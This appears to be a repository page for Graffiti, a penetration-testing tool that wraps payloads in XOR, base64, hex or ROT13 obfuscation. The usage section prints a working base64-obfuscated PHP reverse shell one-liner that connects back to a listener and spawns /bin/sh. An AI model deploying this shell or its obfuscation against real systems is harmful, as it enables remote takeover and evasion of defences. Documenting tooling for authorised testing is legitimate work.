• Stars
    star
    176
  • Rank 216,987 (Top 5 %)
  • Language
    Python
  • Created almost 6 years ago
  • Updated almost 6 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A tool to generate obfuscated one liners to aid in penetration testing

graffitibanner

NOTE: Never upload payloads to online checkers

Graffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:

  • Python
  • Perl
  • Batch
  • Powershell
  • PHP
  • Bash

Graffiti will also accept a language that is not currently on the list and store the oneliner into a database.

Features

Graffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:

  • Xor
  • Base64
  • Hex
  • ROT13
  • Raw

Some features of Graffiti include:

  • Terminal drop in access, with the ability to run external commands
  • Ability to create your own payload JSON files
  • Ability to view cached payloads inside of the database
  • Ability to run the database in memory for quick deletion
  • Terminal history and saving of terminal history
  • Auto tab completion inside of terminal
  • Ability to securely wipe the history files and database file
  • Multiple encoding techniques as mentioned above

Usage

Graffiti comes with a builtin terminal, when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and it's own internal commands. In order to get help, you jsut have to type help or ?:

  ________              _____  _____.__  __  .__ 
 /  _____/___________ _/ ____\/ ____\__|/  |_|__|
/   \  __\_  __ \__  \\   __\\   __\|  \   __\  |
\    \_\  \  | \// __ \|  |   |  |  |  ||  | |  |
 \______  /__|  (____  /__|   |__|  |__||__| |__|
        \/           \/           
 v(0.1)               

no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
root@graffiti:~/graffiti# ?

 Command                                  Description
---------                                --------------
 help/?                                  Show this help
 external                                List available external commands
 cached                                  Display all payloads that are already in the database
 list/show                               List all available payloads
 search <phrase>                         Search for a specific payload
 use <payload> <coder>                   Use this payload and encode it using a specified coder
 info <payload>                          Get information on a specified payload
 check                                   Check for updates
 history                                 Display command history
 exit/quit                               Exit the terminal and running session
 encode <script-type> <coder>            Encode a provided payload

root@graffiti:~/graffiti# help

 Command                                  Description
---------                                --------------
 help/?                                  Show this help
 external                                List available external commands
 cached                                  Display all payloads that are already in the database
 list/show                               List all available payloads
 search <phrase>                         Search for a specific payload
 use <payload> <coder>                   Use this payload and encode it using a specified coder
 info <payload>                          Get information on a specified payload
 check                                   Check for updates
 history                                 Display command history
 exit/quit                               Exit the terminal and running session
 encode <script-type> <coder>            Encode a provided payload

Graffiti also comes with command line arguments for when you need a payload encoded quickly:

usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                   [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                   [-l]
                   [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                   [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                   [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

optional arguments:
  -h, --help            show this help message and exit
  -c CODEC, --codec CODEC
                        specify an encoding technique (*default=None)
  -p PAYLOAD, --payload PAYLOAD
                        pass the path to a payload to use (*default=None)
  --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                        create a payload file and store it inside of
                        ./etc/payloads (*default=None)
  -l, --list            list all available payloads by path (*default=False)
  -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                        pass your own personal payload to use for the encoding
                        (*default=None)
  -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                        pass a listening address to use for the payload (if
                        needed) (*default=None)
  -lP LISTENING-PORT, --lport LISTENING-PORT
                        pass a listening port to use for the payload (if
                        needed) (*default=None)
  -u URL, --url URL     pass a URL if needed by your payload (*default=None)
  -vC, --view-cached    view the cached data already present inside of the
                        database
  -H, --no-history      do not store the command history (*default=True)
  -W, --wipe            wipe the database and the history (*default=False)
  --memory              initialize the database into memory instead of a .db
                        file (*default=False)
  -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                        pass more external commands, this will allow them to
                        be accessed inside of the terminal commands must be in
                        your PATH (*default=None)

Encoding a payload is simple as this:

root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
Encoded Payload:
--------------------------------------------------

php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'

--------------------------------------------------

A demo of Graffiti can be found here:

to_video

Installation

On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:

./install.sh

This will install Graffiti into your system and allow you to run it from anywhere.

Bugs and issues

If you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!

More Repositories

1

WhatWaf

Detect and bypass web application firewalls and protection systems
Python
2,604
star
2

BlueKeep

Proof of concept for CVE-2019-0708
Python
1,170
star
3

WhatBreach

OSINT tool to find breached emails, databases, pastes, and relevant information
Python
1,126
star
4

Zeus-Scanner

Advanced reconnaissance utility
Python
953
star
5

Pybelt

The hackers tool belt
Python
510
star
6

Dagon

Advanced Hash Manipulation
Python
171
star
7

XanXSS

A simple XSS finding tool
Python
107
star
8

tadpole

Download files out of open AWS buckets
Python
37
star
9

HacApt

Package manager for hackers built by hackers
Python
35
star
10

Checkers

Determine everything you need to know to about a system
Python
30
star
11

GitRekt

Search .git folders for emails and URL's that should otherwise be hidden
Python
28
star
12

WhatDir

Multi-threaded web application directory bruteforcer
Python
24
star
13

Strutter

Proof of Concept for CVE-2018-11776
Python
20
star
14

PoC

Leveraging CVE-2018-19788 without root shells
Python
18
star
15

CVE-2019-17625

Working exploit code for CVE-2019-17625
Python
17
star
16

soapy

log file scrubber
Python
15
star
17

CVE-2019-7216

Filechucker filter bypass Proof Of Concept
10
star
18

letmein

Lightweight easy to use password manager
Python
9
star
19

Whisper

Intellegent detection system to determine if a computer has been compromised
8
star
20

arpper

Simple tool to determine live IP addresses on a local network
Python
7
star
21

ISIE

InfoSlut Image Editor
Python
6
star
22

pen-test

Pentesting tools
Python
6
star
23

elastic-custom-scraper

Python
4
star
24

Throwing-Shade

You all know what this is for.
3
star
25

codecademy

Python codecademy
Python
3
star
26

TikTok-Pixel-Code

Deobfuscated and comments TikTok pixel Javascript code
JavaScript
3
star
27

email-tool

An email generator CLI based tool
Ruby
3
star
28

charmed

Issues reported to jetbrains that they decided weren't issues
Python
3
star
29

Gignor

Stashing for computer cleaning
Python
2
star
30

Analyzer.

Simple text Analyzer
Ruby
2
star
31

Inventory-Management-Framework

A basic overview framework of an inventory management system
Python
2
star
32

archiver

Extremely quick file archiver, send files to a zip file in under 30 seconds.
C#
2
star
33

IDENT

Ip address DENying Tool
Python
1
star
34

u2b

Holding repo for a reimage
Python
1
star
35

exercism-io-answers

Exercism.IOanswers
Python
1
star
36

Python-Challenges

Challenges that I've done using Python
Python
1
star
37

C

Learning C from learncthehardway
C
1
star